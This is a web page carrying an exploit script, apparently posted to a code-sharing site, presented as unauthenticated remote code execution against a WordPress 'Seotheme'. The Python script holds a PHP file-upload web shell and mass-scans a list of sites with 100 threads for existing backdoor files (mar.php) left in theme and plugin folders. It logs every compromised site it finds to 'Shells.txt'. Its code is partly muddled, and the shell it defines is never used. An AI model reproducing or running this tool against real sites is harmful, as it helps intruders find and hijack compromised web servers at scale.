扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 | # Exploit Title: WordPress Seotheme - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) fr = Fore.RED fc = Fore.CYAN fw = Fore.WHITE fg = Fore.GREEN fm = Fore.MAGENTA shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(100) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in Shells.txt'.format(fc) |
体验盒子
